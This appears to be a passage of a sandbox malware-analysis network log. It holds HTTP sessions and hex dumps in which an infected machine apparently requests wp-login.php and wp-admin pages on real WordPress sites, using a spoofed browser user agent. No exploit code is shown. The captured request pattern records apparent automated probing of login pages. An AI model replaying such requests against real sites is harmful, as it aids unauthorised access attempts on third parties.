                                                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 7e e3 e4 f1 ef fa f4 cb 93 37 bf cf cb d3 74 de 2e ca 23 fa 00 3f d3 32 5b 5e 7c f6 51 be fc 88 3f c9 b3 19 fd fc b1 c7 8b bc cd d2 e9 3c ab 9b bc fd ec a3 75 7b be 7d f0 51 7a d7 7d b5 cc 16 f9 67 1f 5d 16 f9 d5 aa aa db 8f d2 69 b5 6c f3 25 35 bd 2a 66 ed fc b3 59 7e 59 4c f3 6d fe 23 78 cf b6 6b f3 77 ed 5d 20 70 68 bb d1 5e e6 6d bb da ce 7f d1 ba b8 fc ec a3 13 69 be fd e6 7a 95 0b 1c 40 6a 8b b6 cc 8f 1e df 95 9f f8 84 61 af ea 6a 95 d7 ed f5 67 1f 9d 4f 1e 65 ab d5 ef 5f cc 3c c4 3e dd ff f4 e1 c3 fb fb 3b 07 07 7b f7 f6 ef ed 0a 34 7d 53 46 73 91 2f f3 3a 6b ab da 7b eb 65 5d 9d 7c f1 3a fd c9 bd f1 8e bc e1 bf 50 e7 ab f2 7a bb ad bc f6 f3 e2 32 6b b3 f2 f7 9c 54 6f ab d9 78 be ee bf 34 ad d6 cb b6 be f6 de f9 f6 7a 79 91 e1 93 6e d3 59 de 4c eb 62 d5 16 d5 d2 6b fe 04 a0 d3 df eb 1f fd 3b 7e d0 fc a3 7f f5 45 fa ed 6a 59 66 ab 9f ce e4 75 1a 12 ff 8f fe 79 5c 16 cb b7 69 9d 97 9f 7d 54 d0 cb 44 d8 3a 3f ff ec a3 bb e7 19 cd 4d b5 1c d3 3f 1f a5 2d 11 f6 b3 8f 8b 45 76 91 df 7d b7 4d 1f 2d 3f 66 38 fe db 44 ca 32 a7 61 ae a7 73 6e f1 51 da 14 3f c8 9b cf 3e ba ff e0 dd fd 07 16 ae 34 43 83 6d fe 62 bc 5a 5e 80 a9 6e 05 ea d3 9d 77 9f 12 85 fb a0 f8 8b f7 02 f5 60 ef dd 83 bd 18 28 fe e2 fd 40 7d fa ee c1 a7 51 50 f8 e2 bd 40 ed ee ee bf a3 ff c7 80 d1 c7 f8 ea fd c0 ed ed bc a3 ff 47 c1 c9 57 ef 07 6e 9f 50 d8 8f 63 27 5f bd 1f b8 fb 7b ef e8 ff 51 70 f2 d5 fb 81 3b a0 11 1d c4 07 2b 5f c5 c0 e1 7b 65 f0 8f 84 c1 d1 c8 c2 7c 48 78 3c f4 50 5c ce ea aa 98 29 54 f9 f2 fd a1 de db 7b 77 cf c1 54 49 db e6 4f df 1f d8 c3 4f df 3d 74 dc 67 80 f1 a7 ef 0f 6c f7 d3 77 bb 7d 60 fc 69 0c d8 22 5b 16 e7 79 43 9a 5d df 30 1f 8c 7f ba a1 6e b8 b5 a7 a9 16 0d e6 a4 98 66 d0 55 db 6f 8a 32 3f a9 ca 40 91 fe f8 39 3f b7 78 f3 0c b8 7b 6f de 5d 34 3a 2b 5d 4e f4 c0 b4 f3 7c 91 6f 4f 87 3b 45 7b d1 a6 69 53 4f 09 ea 6b fe a3 b9 bb a8 66 79 bd 2c 7e 50 ff 1e 97 9f 15 cb 93 9f 5c 9f 3e cb 3f fd ce fe 4f ec 3c 38 de 39 9e be 6a 26 df 29 a6 bf ff 57 a7 f7 bf b8 5a bd fa e2 c5 e7 d3 2f db b7 0f f7 df 9c ee 7e 44 06 48 00 2a 74 26 9e 52 4b ed d6 5d 46 ab b9 3b c9 9a fc ee b4 69 a8 8b df e7 fc f3 9d 7a 72 f2 13 eb 5f f4 ec 5e fd a4 99 bc 5d 4e 3e bd fc bd 0e 3e fd c1 f6 bb d9 2f 9a bf fa c1 ea dd f5 cb ea 41 f5 53 a7 b3 8a 6c 14 cf 45 d3 5e 97 79 33 cf f3 f6 23 a8 e6 6e 5f 62 a2 6c 97 93 aa 6a 9b b6 ce 56 f7 b4 c7 f2 a7 7e 9f af 5e e5 5f 7e fb 74 7a fa c5 57
                                                                                                                                                                                                                                                                                                                Data Ascii: `I%&/m{JJt`$@iG#)*eVe]f@{{;N'?\fdlJ!?~|?"~7t.#?2[^|Q?<u{}Qz}g]il%5*fY~YLm#xkw] ph^miz@jajgOe_<>;{4}SFs/:k{e]|:Pz2kTox4zynYLbk;~EjYfuy\i}TD:?M?-Ev}M-?f8D2asnQ?>4CmbZ^nw`(@}QP@GWnPc'_{Qp;+_{e|Hx<P\)T{wTIOO=tglw}`i"[yC]0nfUo2?@9?x{o]4:+]N|oO;E{iSOkfy,~P\>?O<89j&)WZ/~DH*t&RK]F;izr_^]N>>/ASlE^y3#n_bljV~^_~tzW
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.843692064 CET1340INData Raw: bf cf ac fe 45 3f b1 7a f1 c5 2f fa ce f5 77 7f b0 bf 5d bd db b9 5c 7e f9 f6 a7 ef 3d d9 3f 79 b0 dc f9 7a 3d 9e d3 cf ec 2a 6f aa 45 7e 5f fb 7c 71 f9 8b 5e bd 5c 1c 7c ba df 7c f5 fb df fb f4 f3 ea f7 f9 bd bf 98 3f fb bd cf 4e 7e 9f 67 bf d7
                                                                                                                                                                                                                                                                                                                Data Ascii: E?z/w]\~=?yz=*oE~_|q^\||?N~g';W/^z}Nu^,VYYvzl'~ps{=w{?OfUYe3O_{==~A*?}N~/_'g'Ez|Z{
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.843704939 CET1340INData Raw: 8d 1e 93 2f 54 2f cc 9f 3e 29 bd df fd 5f e9 37 03 d5 70 21 72 1a 66 5c fe f7 9b f9 50 df 2e ab 8b ca 7e ef a6 ef 2e d0 74 b3 e0 10 a0 3f e8 77 03 84 dc e7 ed 66 b1 7d 90 06 48 fc d8 8f 49 c6 e1 ad c9 38 cc 35 e3 a0 5f df 04 6e df 01 22 84 f4 bb
                                                                                                                                                                                                                                                                                                                Data Ascii: /T/>)_7p!rf\P.~.t?wf}HI85_n"t/UDly^UMm6BvMP W).o#E-$4y72y<Y-Vd):*ic2cr()O]@L
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.843760014 CET1340INData Raw: 48 c3 40 e8 57 42 4b 20 71 14 43 c4 12 70 ff f8 9f fc 16 0d e9 6f 52 a7 04 94 7e a7 96 0a 39 85 8f 4b 7f 32 78 f9 b5 c9 48 d7 ee 3e 1c 47 c6 87 01 7e 23 d4 0d 07 4e 32 f4 b6 ad ab 65 f1 76 dd 80 c5 0a 0a 2a 48 33 0d f9 7d 45 4a d9 65 fb 02 c6 b6
                                                                                                                                                                                                                                                                                                                Data Ascii: H@WBK qCpoR~9K2xH>G~#N2ev*H3}EJeCGo4Le,od`K(i?Sg&%5}H+EJxjb<| +}Ah8cM,'NYv]I-e5NZdrR2[
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.041785002 CET1340INData Raw: 58 38 81 88 87 e8 9e 45 87 07 e9 27 39 b1 86 fe 8f fe c5 e6 8d d4 4b b4 5a 7e a7 e7 03 3b f9 47 ff 3c fa fb 1f fd ab e5 83 7f f4 2f 66 9d f3 be e0 fd e4 e8 3f fa b7 fe a3 7f 1f 7e ff 3a 70 22 b9 d0 7f f4 6f 6d fe d1 bf 98 82 be af 0f 74 30 ab f3
                                                                                                                                                                                                                                                                                                                Data Ascii: X8E'9KZ~;G</f?~:p"omt0.,GtyGjD:D{?JC1<-/_Wc<[F7aO/Y!;~J-K~BFyZ4IE6Iu7OO^_
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.041796923 CET431INData Raw: ed ea e2 e4 d3 8b 9f fa ee ab cb af de ee ed ff e4 c9 c5 77 76 de af 13 12 dd e9 5b e9 e3 e5 de a4 f9 bd d7 ed ef 73 fe fa 3b 2f 5e 5f 5d 5d 3c 5d fc 60 af 3a de 9e 9e 65 af 7e 62 ef 60 fe fb bf 7c fd fb 2c ef bd 58 fd fe 7b 07 5f f4 fa e0 7f 4c
                                                                                                                                                                                                                                                                                                                Data Ascii: wv[s;/^_]]<]`:e~b`|,X{_LGTth}?%m)g<]oStu'hBm>3Z[ekR$RFWy>{~ce*.o=y)K:sNt%wt-/4V1)5Xc(<[y.z[
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.042921066 CET312OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: bokod.hu
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                Cookie: ASP.NET_SessionId=oapnk3hjjknady5gfqszwsoq
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Referer: http://bokod.hu/wp-login.php
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.253546000 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/8.5
                                                                                                                                                                                                                                                                                                                X-AspNetMvc-Version: 5.2
                                                                                                                                                                                                                                                                                                                X-AspNet-Version: 4.0.30319
                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:31 GMT
                                                                                                                                                                                                                                                                                                                Content-Length: 6425
                                                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 7e e3 e4 f1 ef fa f4 cb 93 37 bf cf cb d3 74 de 2e ca 23 fa 00 3f d3 32 5b 5e 7c f6 51 be fc 88 3f c9 b3 19 fd fc b1 c7 8b bc cd d2 e9 3c ab 9b bc fd ec a3 75 7b be 7d f0 51 7a d7 7d b5 cc 16 f9 67 1f 5d 16 f9 d5 aa aa db 8f d2 69 b5 6c f3 25 35 bd 2a 66 ed fc b3 59 7e 59 4c f3 6d fe 23 78 cf b6 6b f3 77 ed 5d 20 70 68 bb d1 5e e6 6d bb da ce 7f d1 ba b8 fc ec a3 13 69 be fd e6 7a 95 0b 1c 40 6a 8b b6 cc 8f 1e df 95 9f f8 84 61 af ea 6a 95 d7 ed f5 67 1f 9d 4f 1e 65 ab d5 ef 5f cc 3c c4 3e dd ff f4 e1 c3 fb fb 3b 07 07 7b f7 f6 ef ed 0a 34 7d 53 46 73 91 2f f3 3a 6b ab da 7b eb 65 5d 9d 7c f1 3a fd c9 bd f1 8e bc e1 bf 50 e7 ab f2 7a bb ad bc f6 f3 e2 32 6b b3 f2 f7 9c 54 6f ab d9 78 be ee bf 34 ad d6 cb b6 be f6 de f9 f6 7a 79 91 e1 93 6e d3 59 de 4c eb 62 d5 16 d5 d2 6b fe 04 a0 d3 df eb 1f fd 3b 7e d0 fc a3 7f f5 45 fa ed 6a 59 66 ab 9f ce e4 75 1a 12 ff 8f fe 79 5c 16 cb b7 69 9d 97 9f 7d 54 d0 cb 44 d8 3a 3f ff ec a3 bb e7 19 cd 4d b5 1c d3 3f 1f a5 2d 11 f6 b3 8f 8b 45 76 91 df 7d b7 4d 1f 2d 3f 66 38 fe db 44 ca 32 a7 61 ae a7 73 6e f1 51 da 14 3f c8 9b cf 3e ba ff e0 dd fd 07 16 ae 34 43 83 6d fe 62 bc 5a 5e 80 a9 6e 05 ea d3 9d 77 9f 12 85 fb a0 f8 8b f7 02 f5 60 ef dd 83 bd 18 28 fe e2 fd 40 7d fa ee c1 a7 51 50 f8 e2 bd 40 ed ee ee bf a3 ff c7 80 d1 c7 f8 ea fd c0 ed ed bc a3 ff 47 c1 c9 57 ef 07 6e 9f 50 d8 8f 63 27 5f bd 1f b8 fb 7b ef e8 ff 51 70 f2 d5 fb 81 3b a0 11 1d c4 07 2b 5f c5 c0 e1 7b 65 f0 8f 84 c1 d1 c8 c2 7c 48 78 3c f4 50 5c ce ea aa 98 29 54 f9 f2 fd a1 de db 7b 77 cf c1 54 49 db e6 4f df 1f d8 c3 4f df 3d 74 dc 67 80 f1 a7 ef 0f 6c f7 d3 77 bb 7d 60 fc 69 0c d8 22 5b 16 e7 79 43 9a 5d df 30 1f 8c 7f ba a1 6e b8 b5 a7 a9 16 0d e6 a4 98 66 d0 55 db 6f 8a 32 3f a9 ca 40 91 fe f8 39 3f b7 78 f3 0c b8 7b 6f de 5d 34 3a 2b 5d 4e f4 c0 b4 f3 7c 91 6f 4f 87 3b 45 7b d1 a6 69 53 4f 09 ea 6b fe a3 b9 bb a8 66 79 bd 2c 7e 50 ff 1e 97 9f 15 cb 93 9f 5c 9f 3e cb 3f fd ce fe 4f ec 3c 38 de 39 9e be 6a 26 df 29 a6 bf ff 57 a7 f7 bf b8 5a bd fa e2 c5 e7 d3 2f db b7 0f f7 df 9c ee 7e 44 06 48 00 2a 74 26 9e 52 4b ed d6 5d 46 ab b9 3b c9 9a fc ee b4 69 a8 8b df e7 fc f3 9d 7a 72 f2 13 eb 5f f4 ec 5e fd a4 99 bc 5d 4e 3e bd fc bd 0e 3e fd c1 f6 bb d9 2f 9a bf fa c1 ea dd f5 cb ea 41 f5 53 a7 b3 8a 6c 14 cf 45 d3 5e 97 79 33 cf f3 f6 23 a8 e6 6e 5f 62 a2 6c 97 93 aa 6a 9b b6 ce 56 f7 b4 c7 f2 a7 7e 9f af 5e e5 5f 7e fb 74 7a fa c5 57 bf cf ac fe 45 3f b1 7a f1 c5 2f fa ce f5 77 7f b0 bf 5d bd db b9 5c 7e f9 f6 a7 ef 3d d9 3f 79 b0 dc f9 7a 3d 9e d3 cf ec 2a 6f aa 45 7e 5f fb 7c 71 f9 8b 5e bd 5c 1c 7c ba df 7c f5 fb df fb f4 f3 ea f7 f9 bd bf 98 3f fb bd cf 4e 7e 9f 67 bf d7 fd 27 fb 3b bf d7
                                                                                                                                                                                                                                                                                                                Data Ascii: `I%&/m{JJt`$@iG#)*eVe]f@{{;N'?\fdlJ!?~|?"~7t.#?2[^|Q?<u{}Qz}g]il%5*fY~YLm#xkw] ph^miz@jajgOe_<>;{4}SFs/:k{e]|:Pz2kTox4zynYLbk;~EjYfuy\i}TD:?M?-Ev}M-?f8D2asnQ?>4CmbZ^nw`(@}QP@GWnPc'_{Qp;+_{e|Hx<P\)T{wTIOO=tglw}`i"[yC]0nfUo2?@9?x{o]4:+]N|oO;E{iSOkfy,~P\>?O<89j&)WZ/~DH*t&RK]F;izr_^]N>>/ASlE^y3#n_bljV~^_~tzWE?z/w]\~=?yz=*oE~_|q^\||?N~g';
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.253557920 CET1340INData Raw: ce 57 ed a7 a7 c7 2f 5e 9e dd bb f8 7a 7d 4e ca 75 5e 2c 56 db 17 59 59 e6 f5 b5 76 fb dd f6 f3 ec bb a7 c7 cf bf 7a bb ff dd e6 cb b3 f5 6c f9 e5 f9 83 f5 d3 df e7 27 7e 70 f0 f2 c5 ef 73 fd 7b 3d b9 b7 77 fa 7b 1d 3f f9 c9 e7 4f bf 66 b7 e7 c4
                                                                                                                                                                                                                                                                                                                Data Ascii: W/^z}Nu^,VYYvzl'~ps{=w{?OfUYe3O_{==~A*?}N~/_'g'Ez|Z{':;{}3Eg^o-?o^tqsz|3O:'O
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.253678083 CET1340INData Raw: af 0b 12 1d 17 d8 55 cb b7 44 bf 6c 79 fd 83 ac bd bb 5e 16 55 b3 4d e6 f5 a7 f3 b7 6d fe 36 18 42 0c d2 76 9b d7 97 b7 02 b5 4d 9d ee e2 9f 07 01 50 7f 20 de ef fe af f4 9b e9 57 29 be cc 2e cd f8 fc 6f 23 b3 45 2d cd b7 f4 eb 24 e3 af d2 34 fa
                                                                                                                                                                                                                                                                                                                Data Ascii: UDly^UMm6BvMP W).o#E-$4y72y<Y-Vd):*ic2cr()O]@Lm{Rd<+Ef146Gg5'h!)?krffV"NH$FG
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.253690004 CET1340INData Raw: af 34 4c 65 95 98 2c 01 c5 6f 64 00 60 c0 4b 0a bf 28 cd 0d 69 a3 3f a4 53 fe e4 67 b3 e3 e6 07 d9 84 d6 19 88 0c c4 26 f4 cd 25 e4 f1 35 7d 48 fd 13 81 f4 9b 11 2b eb 0f 94 45 4a 78 95 97 19 a5 8b 6a 62 3c 88 c1 0b 7c 20 fd f0 a7 f2 2b 7d f5 41
                                                                                                                                                                                                                                                                                                                Data Ascii: 4Le,od`K(i?Sg&%5}H+EJxjb<| +}Ah8cM,'NYv]I-e5NZdrR2[=yS"D%DfwWI/K)g;]5si9JlI]TV
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.253706932 CET1340INData Raw: d1 f1 a0 ab 2e e1 df 2c 47 74 79 83 a8 47 6a fb 1f fd ab 7f f0 8f fe d5 44 3a fa 44 bf 7b 3f d6 d0 90 e1 1f fd fb 4a 02 43 31 3c 2d 0d d0 2f 5f 03 9f e7 f9 c5 f2 1f fd ab 57 b0 63 ff f8 df 3c 99 a4 d3 e2 ed 5b 0c 8c be 92 46 37 61 06 bc f8 17 4f
                                                                                                                                                                                                                                                                                                                Data Ascii: .,GtyGjD:D{?JC1<-/_Wc<[F7aO/Y!;~J-K~BFyZ4IE6Iu7OO^_0m@;q4ww%uhn|'r{_M2+o(B{+{mjbl
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.253717899 CET343INData Raw: 74 f7 dd 9f ce 68 7d 8a 3f 15 25 f3 bb 6d cd aa 29 67 17 ef 8c eb 3c 9b 5d 6f 9d af 97 53 08 74 ba 75 27 fd c5 68 42 6d 3e 1a 33 5a 1f dd 91 9f 5b f2 f9 8f 65 6b 52 a5 24 92 8f 52 a4 c0 46 e1 87 af 57 79 3e 7b 94 7e ba b3 b3 63 be 99 65 a4 2a 2e
                                                                                                                                                                                                                                                                                                                Data Ascii: th}?%m)g<]oStu'hBm>3Z[ekR$RFWy>{~ce*.o=y)K:sNt%wt-/4V1)5Xc(<[y.z[gFQfd_}8OcfQ]'qQUF}SF^%oNi@FF|D_"(S-


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                147192.168.2.6574853.33.130.19080
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.634149075 CET229OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: mgnbizlaw.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.741441965 CET890INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:31 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Content-Length: 142
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Location: https://mgnbizlaw.com/wp-login.php
                                                                                                                                                                                                                                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_Hjbo0biK6GwEJi2HZQJJ/tmZCQStyvg7cHHGMY/xXaN+/q7yZX0vgymmyyxDUHR7rKd+qm+xBOaFEA0Z4w0KcA
                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                Set-Cookie: caf_ipaddr=10.116.88.246;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                Set-Cookie: country=;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                Set-Cookie: city="";Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.944593906 CET890INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:31 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Content-Length: 142
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Location: https://mgnbizlaw.com/wp-login.php
                                                                                                                                                                                                                                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_Hjbo0biK6GwEJi2HZQJJ/tmZCQStyvg7cHHGMY/xXaN+/q7yZX0vgymmyyxDUHR7rKd+qm+xBOaFEA0Z4w0KcA
                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                Set-Cookie: caf_ipaddr=10.116.88.246;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                Set-Cookie: country=;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                Set-Cookie: city="";Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                148192.168.2.6574803.33.130.19080
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.634613037 CET229OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: mgnbizlaw.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.740336895 CET890INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:31 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Content-Length: 142
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Location: https://mgnbizlaw.com/wp-login.php
                                                                                                                                                                                                                                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_Hjbo0biK6GwEJi2HZQJJ/tmZCQStyvg7cHHGMY/xXaN+/q7yZX0vgymmyyxDUHR7rKd+qm+xBOaFEA0Z4w0KcA
                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                Set-Cookie: caf_ipaddr=10.116.88.101;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                Set-Cookie: country=;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                Set-Cookie: city="";Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.944578886 CET890INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:31 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Content-Length: 142
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Location: https://mgnbizlaw.com/wp-login.php
                                                                                                                                                                                                                                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_Hjbo0biK6GwEJi2HZQJJ/tmZCQStyvg7cHHGMY/xXaN+/q7yZX0vgymmyyxDUHR7rKd+qm+xBOaFEA0Z4w0KcA
                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                Set-Cookie: caf_ipaddr=10.116.88.101;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                Set-Cookie: country=;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                Set-Cookie: city="";Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400;
